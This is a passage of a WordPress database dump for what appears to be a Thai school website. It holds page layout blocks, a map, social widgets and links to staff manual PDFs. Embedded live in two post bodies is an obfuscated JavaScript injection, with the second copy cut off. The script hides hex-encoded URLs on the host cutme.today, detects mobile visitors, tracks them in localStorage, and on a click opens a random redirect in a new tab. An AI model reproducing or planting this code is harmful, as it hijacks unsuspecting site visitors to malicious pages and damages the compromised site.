class=\"wp-image-1682\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d3f1e2c8\",\"isDynamic\":true,\"blockVersion\":4} /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2F61565350226486%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-07-05 14:51:04','2025-07-05 07:51:04','',14,'http://pakhaeng.ssk.in.th/?p=1711',0,'revision','',0),
(1713,1,'2025-07-05 14:52:14','2025-07-05 07:52:14','','คู่มือปฏิบัติงานของบุคลากรทางการศึกษา2568','','inherit','','closed','','%e0%b8%84%e0%b8%b9%e0%b9%88%e0%b8%a1%e0%b8%b7%e0%b8%ad%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%82%e0%b8%ad%e0%b8%87%e0%b8%9a%e0%b8%b8%e0%b8%84','','','2025-07-05 14:52:14','2025-07-05 07:52:14','',784,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/คู่มือปฏิบัติงานของบุคลากรทางการศึกษา2568.pdf',0,'attachment','application/pdf',0),
(1714,1,'2025-07-05 14:52:22','2025-07-05 07:52:22','<!-- wp:file {\"id\":815,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือการปฏิบัติงาน.pdf\",\"displayPreview\":true,\"previewHeight\":1200} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือการปฏิบัติงาน.pdf\" type=\"application/pdf\" style=\"width:100%;height:1200px\" aria-label=\"คู่มือการปฏิบัติงานของเจ้าหน้าที่\"></object><a id=\"wp-block-file--media-27bb8d24-9bca-4395-9358-a87d517f52df\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือการปฏิบัติงาน.pdf\">คู่มือการปฏิบัติงานของเจ้าหน้าที่</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือการปฏิบัติงาน.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-27bb8d24-9bca-4395-9358-a87d517f52df\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:file {\"id\":1713,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/คู่มือปฏิบัติงานของบุคลากรทางการศึกษา2568.pdf\",\"displayPreview\":true,\"previewHeight\":1200} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/คู่มือปฏิบัติงานของบุคลากรทางการศึกษา2568.pdf\" type=\"application/pdf\" style=\"width:100%;height:1200px\" aria-label=\"คู่มือปฏิบัติงานของบุคลากรทางการศึกษา2568\"></object><a id=\"wp-block-file--media-264eafb8-7081-4295-bcbb-7b65e3fd3fc2\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/คู่มือปฏิบัติงานของบุคลากรทางการศึกษา2568.pdf\">คู่มือปฏิบัติงานของบุคลากรทางการศึกษา2568</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/คู่มือปฏิบัติงานของบุคลากรทางการศึกษา2568.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-264eafb8-7081-4295-bcbb-7b65e3fd3fc2\">Download</a></div>\n<!-- /wp:file -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const 